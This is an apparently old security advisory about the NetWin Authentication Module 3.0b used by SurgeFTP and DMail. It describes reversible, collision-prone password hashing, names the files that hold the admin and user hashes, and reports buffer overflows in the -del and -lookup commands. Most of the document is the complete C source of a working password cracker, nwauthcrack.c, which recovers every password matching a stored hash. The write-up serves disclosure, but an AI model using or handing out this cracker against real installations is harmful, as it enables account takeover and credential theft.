COMMAND

    NetWin

SYSTEMS AFFECTED

    NetWin Authentication Module 3.0b

PROBLEM

    'ByteRage'  found  following.   NWAuth  module  as  used by DMail,
    SurgeFTP,  others...  (cfr  www.netwinsite.com)  'ByteRage' tested
    SurgeFTP in particular.

    The source is provided on  all platforms and for Windows  and most
    Unix based platforms it is pre-compiled, as nwauth.exe or  nwauth.
    The  'NetWin  Authentication  module'  which  is used by SurgeFTP,
    DMail and other programs uses a quite 'unusual' hashing  algorithm
    to store the  password hashes.   Because of the  complexity of the
    hashing algorithm,  the users  of NWAuth  may not  be aware of it,
    but the algorithm is flawed in (at least) two ways:

        1) the password hashes can be decrypted
        2) one hash can match more than one password

    So basically we're saying that one user doesn't have one password,
    but  he  can  have  a  few  million  besides  the  one that he was
    actually assigned. (no comment...)

    Fortunately,   SurgeFTP   has   some   anti-hammering   techniques
    implemented to prevent bruteforcing.

    As   for   the   decryption,   below   is   attached  source  code
    (nwauthcrack.c) that  will generate  all possible  passwords for a
    given hash.  The password hashes used by fe SurgeFTP can be  found
    within  the  files   \surgeftp\admin.dat  (sysadmin  password)   &
    \surgeftp\nwauth.clg (user passwords)

    Storing the passwords using MD5 hashes would probably be a  better
    idea, maybe added up with  a simple cipher to prevent  the average
    script kiddie from attacking  the passwordfile with canned  tools.
    (this type of hashing is done  by Serv-U FTP).  And if  one really
    wants  to  implement  salting,  then  append  the  username to the
    password and feed  it into the  MD5 hashing algorithm,  it has the
    same effect, it's easier and much more secure.

    NWAuth also has  alot of buffer  overflows riddled throughout  the
    source code  (especially older  versions, like  2.0), which  might
    lead to serious flaws in programs that use this module.   Although
    version 2.0 probably  contained much more  of them, here  are some
    examples of buffer overflows which are still not fixed in  version
    3.0b:
    -> the  nwauth  -del  command  causes  an  access  violation  when
       supplied with  a very  long username,  this might  not be a big
       deal since only administrators are supposed to delete users
    -> the  nwauth  -lookup  command  causes an access violation  when
       supplied a  username of  about 1000  characters, this  might be
       triggered  by  an  attacker  if  the  program  would  pass this
       username from a "USER" command

    The code:

    /********************************************************************
     * nwauthcrack.c - NetWin Authentication Module password cracker    *
     * the SurgeFTP encrypted passwords can be found in the admin.dat & *
     * nwauth.clg files in the nwauth.exe directory                     *
     * by [ByteRage] <byterage@yahoo.com> [http://www.byterage.cjb.net] *
     ********************************************************************/
    
    #include <string.h>
    #include <stdio.h>
    
    FILE *fh;
    /* the following table indices refer to the characters our
       generated password may consist of (true/false), since
       we don't want to go into too much trouble when typing
       everything in :) */
    const char okaychars[256] = {
    0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
    0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
    0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
    1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,
    0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,
    1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,
    0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,
    1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,
    0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
    0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
    0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
    0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
    0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
    0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
    0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
    0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
    };
    
    /* DECRYPTION ALGORITHMS */
    int enumpwds(unsigned char encrypted[]) {
      int heavycrypt0;
      unsigned int num=0, i, x;
      unsigned char j[256], decrypted[256];
      for(i=0; i<256;i++) { j[i] = 0; }
    brute:
      heavycrypt0 = (unsigned char)encrypted[1]*255+(unsigned char)encrypted[0];
      for(i=0; i+2 < strlen(encrypted); i++) {
        for(x=j[i]; x < 256; x++) {
	      if ((x * (heavycrypt0+1) % 40 == (encrypted[i+2]-0x41)) & okaychars[x]) {
	        decrypted[i] = x;
		    break;
	      }
        }
	    if (x == 256) {
    next:
	      if (i == 0) return num;
	      if (j[i-1] < 256) { j[i-1] = decrypted[i-1]+1; x = i; } else { i--; goto next; }
	      for (i=x; i < 256; i++) { j[i] = 0; }
	      goto brute;
	    }
	    heavycrypt0 += x; heavycrypt0 *= 3; heavycrypt0 %= 0x7D00;
      }
      decrypted[i] = '\x00';
      num++;
      printf("%s\n", decrypted);
      if (j[i-1] < 256) { j[i-1] = decrypted[i-1]+1; x = i; } else { i--; goto next; }
      for (i=x; i < 256; i++) { j[i] = 0; }
      goto brute;
    }
    /* DECRYPTION ALGORITHMS END */
    
    void main(int argc, char ** argv) {
      char buf[256]; int k, l;
    
      printf("NetWin Authentication Module password cracker by [ByteRage]\n\n");
    
      if (argc < 2) { printf("Syntax : %s <password>\n", argv[0]); return; }
      printf("%s ->\n",argv[1]);
    
      printf("\n%d passwords found for %s\n",enumpwds(argv[1]),argv[1]);
    }

SOLUTION

    Nothing yet.